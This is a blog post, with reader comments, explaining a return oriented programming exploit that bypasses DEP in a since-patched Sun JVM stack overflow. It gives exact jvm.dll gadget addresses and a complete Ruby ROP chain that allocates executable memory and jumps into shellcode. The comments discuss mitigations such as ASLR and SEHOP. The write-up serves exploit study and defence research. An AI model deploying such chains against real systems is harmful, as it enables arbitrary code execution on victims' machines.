Monday, 12 April 2010

A little return oriented exploitation on Windows x86 (Part 1)

This post looks at how Return Oriented Programming (ROP) can be used on x86 Windows to bypass DEP and gain arbitrary code execution. The example comes from an exploit I wrote last year for a stack-based buffer overflow I found in the Sun Java Virtual Machine, which was recently patched and disclosed by TippingPoint's ZDI (ZDI-10-061). Part 2 of this blog post will look at an experimental compiler convention that aims to mitigate return oriented attacks such as the one presented here.

It should be noted that a ROP attack against the JVM is not strictly required: the JVM employs an executable heap, which allows an attacker to circumvent DEP and ASLR through heap spraying with a high degree of reliability. It still makes for an interesting case study, however.

Getting Our Bearings
The cmm!readMabCurveData bug (which I won't be discussing specifically in this post) is a vanilla stack-based buffer overflow: we gain EIP control via an overwritten return address, and we control a large portion of the data on the stack, pointed to by ESP. ESI will also be pointing near our shellcode buffer, which has been placed on the stack.

Assuming ASLR is in place, we need to locate the address of one or more suitable images in memory so that we can begin to create some gadgets. Conveniently, the JVM applies no relocation to most of its modules, so we can use static base addresses for them. In other scenarios we would need to leverage a memory leak, or similar, to first discover a suitable module's address in memory.

The Plan
We will execute the following pseudo C code via several gadgets in order to bypass DEP and execute shellcode:

// we start with a pointer that is near-ish our shellcode (held in ESI at the time we get control)
extern BYTE * pNonExecutableShellcode;
// first we will modify this pointer to point into our shellcode buffer
pNonExecutableShellcode -= 8192;
// we will then proceed to allocate some read/write/executable memory...
BYTE * pExecutableMemory = VirtualAlloc( 0, 0x4000, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// and then copy our shellcode into this executable memory...
memmove( pExecutableMemory, pNonExecutableShellcode, 0x3000 );
// finally we can execute the shellcode...
((void (*)(void))pExecutableMemory)();

In total it will take 10 distinct gadgets to perform the above (the listing below runs to 11 steps because gadget 1 is reused as step 7).

The Gadgets
We pick the module jvm.dll (version 1.6.0_14 at the original time of writing) which has a fixed base address of 0x6D800000 and will not be relocated.

First we calculate a pointer to the shellcode on the stack...

// (1) when we first return we must remove 3 DWORDs from the stack (the previous stack frame's parameters, which were altered)
0x6D8011AC: add esp, 12
0x6D8011AF: ret

// (2) get in some needed registers...
// ESI = pointer to stack just below shellcode
0x6D8FF623: mov edx, esi // save ESI into EDX for later
0x6D8FF625: pop esi // (2.A) unused
0x6D8FF626: mov eax, ebx
0x6D8FF628: pop ebx // (2.B) unused
0x6D8FF629: pop ebp // (2.C) unused
0x6D8FF62A: retn 12

// (3) set ECX to the stack adjust size
0x6D81BDD7: pop ecx // (3.A) 0x00002000
0x6D81BDD8: ret

// (4) set EDI = address where we save the shellcode address
0x6D802A88: pop edi // (4.A) 0x6DA612CC
0x6D802A89: ret

// (5) sub EDX, ECX to point to the shellcode buffer...
// ECX = size: 8192
// EDX = pointer to stack below shellcode (around ESP)
// EDI = writeable address
0x6D97ED06: sub edx, ecx // calculate address of shellcode
0x6D97ED08: mov [edi], edx // save it for later
0x6D97ED0A: pop edi // (5.A) unused
0x6D97ED0B: pop esi // (5.B) unused
0x6D97ED0C: pop ebp // (5.C) unused
0x6D97ED0D: retn 12
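
The `retn 12` at the end of gadgets 2 and 5 is easy to misread when laying out the stack: the return address is popped first and only then are the 12 bytes discarded, so the padding sits after the next gadget's address rather than before it. A minimal sketch of that ordering, assuming a toy model in which the stack is a Ruby array of DWORDs and ESP is an index into it (the `ret` helper is hypothetical, written only for this illustration):

```ruby
# Toy model of x86 `ret` / `retn imm16`.
# Assumption: one array slot == one DWORD, lowest address first.
def ret(stack, esp, imm_bytes = 0)
  eip = stack[esp]          # pop the return address first...
  esp += 1
  esp += imm_bytes / 4      # ...then discard imm_bytes of stack
  [eip, esp]
end

# The stack as gadget 2 sees it just before its `retn 12`
# (its three pops have already consumed 2.A, 2.B and 2.C).
stack = [
  0x6D81BDD7,                          # (3) address of the next gadget
  0xAAAAAAAA, 0xAAAAAAAA, 0xAAAAAAAA,  # discarded by `retn 12`
  0x00002000,                          # (3.A) popped into ECX by gadget 3
  0x6D802A88                           # (4)
]

eip, esp = ret(stack, 0, 12)           # gadget 2: retn 12
ecx = stack[esp]                       # gadget 3: pop ecx
eip_after, = ret(stack, esp + 1)       # gadget 3: ret
```

This is why, in the call stack further down, three unused DWORDs follow the addresses of gadgets 3 and 6.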

Now we VirtualAlloc a RWX buffer...

// (6) we just call a whole function here, ret2libc style...
0x6D970A50: push ebp
0x6D970A51: mov ebp, esp
0x6D970A53: mov eax, [ebp+12] // (6.B) allocation size: 0x00004000
0x6D970A56: test eax, eax
0x6D970A58: jnz short 0x6D970A5E
0x6D970A5A: mov al, 1
0x6D970A5C: pop ebp
0x6D970A5D: retn
0x6D970A5E: push 0x40 // PAGE_EXECUTE_READWRITE
0x6D970A60: push 0x1000 // MEM_COMMIT
0x6D970A65: push eax
0x6D970A66: mov eax, [ebp+8] // (6.A) allocation address: 0x00000000
0x6D970A69: push eax
0x6D970A6A: call VirtualAlloc
0x6D970A70: test eax, eax
0x6D970A72: setnz al
0x6D970A75: pop ebp
0x6D970A76: ret

// (7) reuse gadget 1 to advance past the two arguments (plus one padding DWORD) used for the function call in gadget 6
0x6D8011AC: add esp, 12
0x6D8011AF: ret

Now we memmove the shellcode into the new RWX buffer...

// (8) move the new RWX buffer EAX into ECX for the upcoming memmove...
0x6D824C7C: mov ecx, eax
0x6D824C7E: mov eax, [ecx+20]
0x6D824C81: add esp, 4
0x6D824C84: add eax, ecx
0x6D824C86: pop ebp
0x6D824C87: ret

// (9) set EAX to our shellcode buffer on stack, which we stored in gadget 5
0x6D808150: mov eax, dword ptr [0x6DA612CC]
0x6D808155: retn 8

// (10) perform the memmove, returning the destination buffer in EAX
// the memmove size is a parameter we have already placed on the stack.
0x6D85A181: push eax // the source address (shellcode on stack)
0x6D85A182: push ecx // the destination address (new RWX buffer)
0x6D85A183: call memmove // memmove returns the dest address in EAX
0x6D85A189: add esp, 12
0x6D85A18C: pop ebp // (10.A) unused
0x6D85A18D: ret

Finally we can execute the shellcode...

// (11) EAX is the RWX shellcode buffer so jump into it...
0x6D96FA23: jmp eax
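
One detail in the listings above is worth working through: gadget 6 executes `setnz al` after VirtualAlloc returns, which overwrites the low byte of EAX with 1. Since VirtualAlloc returns a page-aligned address, the value that gadget 8 moves into ECX (and that memmove later returns) is the buffer address plus one, so the copy must be at most one byte shorter than the allocation. A small sketch of the arithmetic, assuming a made-up allocation address (`alloc_base` is hypothetical; the sizes are the ones used in this post):

```ruby
alloc_base = 0x02A50000   # hypothetical page-aligned VirtualAlloc result
alloc_size = 0x4000       # (6.B) allocation size
copy_size  = 0x3000       # memmove size

# `setnz al` replaces only the low byte of EAX; on success it becomes 1.
eax = (alloc_base & 0xFFFFFF00) | 0x01

max_copy = alloc_base + alloc_size - eax   # bytes left after the 1-byte shift
fits     = copy_size <= max_copy
```

Here `max_copy` works out to `alloc_size - 1`, and because memmove returns its destination, the final `jmp eax` lands on the first byte of the copied shellcode.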

The Call Stack
Using the above we construct a call stack which includes the return addresses, parameters and padding bytes as shown below in Ruby:

# when we get EIP control we use this...
eip = [0x6D8011AC].pack('V') # (1) return to stack fix up

# prior to the stack fix up, ESP will point to this...
# (the first 3 dwords are parameters from the last function call)
rop = [0x00000000].pack('V') # null to avoid crashing
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6DA612CC].pack('V') # writeable memory to avoid crashing
rop << [0x6D8FF623].pack('V') # (2) return to register load
rop << [0xAAAAAAAA].pack('V') # (2.A) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (2.B) EBX, unused
rop << [0xAAAAAAAA].pack('V') # (2.C) EBP, unused
rop << [0x6D81BDD7].pack('V') # (3)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00002000].pack('V') # (3.A) ECX, subtract from EDX to point to shellcode
rop << [0x6D802A88].pack('V') # (4)
rop << [0x6DA612CC].pack('V') # (4.A) EDI, address to save shellcode pointer
rop << [0x6D97ED06].pack('V') # (5)
rop << [0xAAAAAAAA].pack('V') # (5.A) EDI, unused
rop << [0xAAAAAAAA].pack('V') # (5.B) ESI, unused
rop << [0xAAAAAAAA].pack('V') # (5.C) EBP, unused
rop << [0x6D970A50].pack('V') # (6)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D8011AC].pack('V') # (7)
rop << [0x00000000].pack('V') # (6.A) null to alloc anywhere
rop << [0x00004000].pack('V') # (6.B) alloc_size
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D824C7C].pack('V') # (8)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x6D808150].pack('V') # (9)
rop << [0x6D85A181].pack('V') # (10)
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0xAAAAAAAA].pack('V') # unused
rop << [0x00003000].pack('V') # memmove size (<= alloc_size - 1)
rop << [0xAAAAAAAA].pack('V') # (10.A) unused
rop << [0x6D96FA23].pack('V') # (11) exec shellcode
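
A layout like this can be sanity-checked offline by recording each gadget's net stack effect and walking the chain. The following is only a sketch: the `walk` helper and the `skip`/`imm` table are hypothetical names, and the stack effects are transcribed by hand from the gadget listings above, so any transcription error would carry through.

```ruby
pad = 0xAAAAAAAA

# Net stack effect of each gadget:
#   skip: DWORDs consumed (pop / add esp) before the final ret
#   imm:  the N in `retn N`, in bytes (0 for a plain ret)
gadgets = {
  0x6D8011AC => { skip: 3, imm: 0 },   # (1)/(7) add esp, 12
  0x6D8FF623 => { skip: 3, imm: 12 },  # (2) three pops, retn 12
  0x6D81BDD7 => { skip: 1, imm: 0 },   # (3) pop ecx
  0x6D802A88 => { skip: 1, imm: 0 },   # (4) pop edi
  0x6D97ED06 => { skip: 3, imm: 12 },  # (5) three pops, retn 12
  0x6D970A50 => { skip: 0, imm: 0 },   # (6) balanced function call
  0x6D824C7C => { skip: 2, imm: 0 },   # (8) add esp, 4 + pop ebp
  0x6D808150 => { skip: 0, imm: 8 },   # (9) retn 8
  0x6D85A181 => { skip: 2, imm: 0 },   # (10) 2 pushes, add esp 12, pop ebp
  0x6D96FA23 => nil                    # (11) jmp eax, end of chain
}

# The same DWORDs as the rop string above, in order.
chain = [
  0x00000000, pad, 0x6DA612CC,
  0x6D8FF623, pad, pad, pad,
  0x6D81BDD7, pad, pad, pad, 0x00002000,
  0x6D802A88, 0x6DA612CC,
  0x6D97ED06, pad, pad, pad,
  0x6D970A50, pad, pad, pad,
  0x6D8011AC, 0x00000000, 0x00004000, pad,
  0x6D824C7C, pad, pad,
  0x6D808150,
  0x6D85A181, pad, pad, 0x00003000, pad,
  0x6D96FA23
]

# Follow the returns; fetch raises if a return lands on a non-gadget value.
def walk(first_eip, chain, gadgets)
  trace = [first_eip]
  eip = first_eip
  esp = 0
  while (g = gadgets.fetch(eip))
    esp += g[:skip]
    eip = chain.fetch(esp)
    esp += 1 + g[:imm] / 4
    trace << eip
  end
  [trace, esp]
end

trace, final_esp = walk(0x6D8011AC, chain, gadgets)
rop = chain.pack('V*')   # same bytes as the incremental rop << ... form
```

If the walk completes, `trace` lists the gadgets in execution order and `final_esp` equals the chain length, meaning every DWORD is accounted for.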

In this particular example, exploitation would have been harder had the /GS compiler switch been used (assuming Visual Studio is used for compilation), as we would not have been able to gain initial EIP control via the overwritten return address. However, due to a limitation in the /GS protection, we would still be able to get EIP control via an overwritten structured exception handler. Had /DYNAMICBASE been employed for the jvm.dll module (and all other modules loaded in the target process), we would not be able to rely on the static addresses used above. Instead we would need to determine the base address of jvm.dll at run time before constructing the ROP call stack.
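
If the base address did have to be discovered at run time, the gadget addresses could be rebased by a simple delta before packing. A minimal sketch, assuming the base has already been obtained somehow (the `rebase` helper and the `leaked_base` value are hypothetical; 0x6D800000 is the fixed jvm.dll base used in this post):

```ruby
# Shift addresses from the module's preferred base to its actual base.
def rebase(addresses, preferred_base, actual_base)
  delta = actual_base - preferred_base
  addresses.map { |a| (a + delta) & 0xFFFFFFFF }
end

preferred_base = 0x6D800000   # jvm.dll base assumed throughout this post
leaked_base    = 0x5A3C0000   # hypothetical value recovered via a leak

gadget_addrs = [0x6D8011AC, 0x6D8FF623, 0x6D81BDD7]
rebased      = rebase(gadget_addrs, preferred_base, leaked_base)
packed       = rebased.pack('V*')
```

Only code addresses inside the rebased module are adjusted here; any data address used by the chain would need the same treatment relative to whichever module it lives in.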

Next week, part 2 of this post will look at a simple compile-time convention I have been experimenting with to help mitigate return oriented attacks.


jf said...

There's a mitigation that already exists, it's called ASLR.

And no, you wouldn't have been able to corrupt the SEH handler, there's two more mitigations, called SafeSEH and SEHOP.

Stephen Fewer said...

@jf: ASLR can often be circumvented via mem leaks, known modules not using ASLR (nspr4.dll in Firefox/Thunderbird for example), heap spraying and so on. SafeSEH has never stopped me writing an exploit before, but SEHOP is a greater improvement to be fair.

jf said...

Ah, so in order to work, you need a broken ASLR implementation...

And, heap spraying? Seriously? You know you still need to know a heap address right?

Stephen Fewer said...

"Ah, so in order to work, you need a broken ASLR implementation..."

...and the vulnerable software had a broken ASLR implementation?! (this post being an example of an attack against a specific bug and not a generic technique)

"And, heap spraying? Seriously? You know you still need to know a heap address right?"

I mentioned it in general, but sure of course. An interesting example of using heap spraying in IE8 to get an address for a predictable pattern is Peter Vreugdenhil's writeup on his pwn2own bug:

jf said...

re: jvm bug

Fair enough, to some degree you are getting the ire of dealing with a fair number of people as of late that are all "rop! rop!". Part of this is that a shadow stack seems like overkill for a secondary problem. That said, a shadow stack is something I've long argued for, as it helps keep my viewpoint of separating metadata and data into non-contiguous regions.

That said, my point was more to that effect-- a properly implemented ASLR effectively mitigates the complication, albeit not a fool proof one (what is?).

I am familiar with both the IE8 stuff and heap-spraying. I think you're misunderstanding. It's not a technique that fixes or really helps with ASLR, it's meant to more mitigate 'heap rift', *any* valid heap address is valid for your use (or as close to it as possible), not just a specific one-- think of it more as eliminating offsets than mitigating ASLR.

The bug in question required a memory leak of a null terminated string (get c++ ptr, heap addr) and the fixed address of ATL (ret into vprotect); without them there was no rop. Beautiful bugs are beautiful bugs (s/bugs/exploits/), don't get me wrong, it's just that imho the beauty was the chaining of conditions together, by which I am not so much referencing the chaining together of function epilogues.

Either way, you're getting more from me than I meant, call it a frustration on the subject improperly vented.
